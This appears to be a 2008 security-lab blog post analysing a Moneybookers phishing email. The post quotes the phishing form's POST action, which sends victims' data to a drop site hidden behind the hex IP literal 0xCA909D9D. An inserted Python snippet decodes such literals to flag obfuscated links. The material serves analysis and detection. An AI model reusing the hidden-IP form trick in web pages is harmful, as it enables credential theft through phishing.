NEWS FROM THE LAB - Sunday, April 6, 2008

Gone Phishing Posted by Mikko @ 22:28 GMT

Somebody is spamming around mails that look like this:


From: "www.moneybookers.com" <support@moneybookers.com>
Subject: MONEY LAUNDERING POLICY
Date: Sun, 6 Apr 2008 06:56:47 +0900

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.

-------------------------------------------------
© Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office:
Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

The attachment is an HTML file asking the user to take part in a "Money Laundering Prevention" program:

Looking at the source code, we can see that the HTML file loads all of its components (images, stylesheets) from moneybookers.com, the real site. But the form's POST action looks funky:

   <form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left">

Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address: the whole 32-bit address written as a single hex number instead of the usual dotted quad, which browsers accept but which hides where the form data is really going.
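
Browsers accept IPv4 hosts written as a single hex, octal or decimal number (or a mix of such parts), which is exactly what makes this trick useful for hiding a drop site. The following is an added example, not code from the post or from F-Secure: it normalises any such literal to dotted-quad form, inet_aton style, and scans a constructed HTML snippet (the form tag above plus one legitimate asset reference) for links whose host is an IP literal written in anything but plain dotted decimal. The dotted-quad value it prints for 0xCA909D9D is computed by the code, not quoted from the post.

```python
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

def _part_to_int(part: str) -> int:
    """Parse one host component the way inet_aton does: 0x.. hex, 0.. octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    raise ValueError(part)  # not numeric: an ordinary hostname label

def decode_ip_literal(host: str) -> Optional[str]:
    """Dotted-quad form of a numeric IPv4 literal (1-4 parts), or None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_part_to_int(p) for p in parts]
    except ValueError:
        return None
    value = 0
    for n in nums[:-1]:               # leading parts are single octets
        if n > 255:
            return None
        value = (value << 8) | n
    tail_bytes = 4 - (len(nums) - 1)  # the last part fills the remaining octets
    if nums[-1] >= 1 << (8 * tail_bytes):
        return None
    value = (value << (8 * tail_bytes)) | nums[-1]
    return str(ipaddress.IPv4Address(value))

def find_obfuscated_ip_links(html: str):
    """(url, dotted_quad) for each action/href/src whose host is an IP literal not in plain dotted decimal."""
    hits = []
    for url in re.findall(r"""(?:action|href|src)\s*=\s*["']([^"']+)["']""", html, re.I):
        host = urlsplit(url).hostname  # lower-cased by urlsplit
        if host and (dotted := decode_ip_literal(host)) and dotted != host:
            hits.append((url, dotted))
    return hits

# Constructed sample: the form tag quoted in the post plus one legitimate asset reference.
SAMPLE_HTML = """
<img src="https://www.moneybookers.com/images/logo.gif">
<form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left">
"""
```

Calling `find_obfuscated_ip_links(SAMPLE_HTML)` flags only the form action and reports its dotted-quad host; the legitimate moneybookers.com asset is left alone.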

Let's see where this goes.

But of course. It turns out to be the site of the Anti-Corruption Commission of Bhutan:

The commission has been informed that they've been hacked.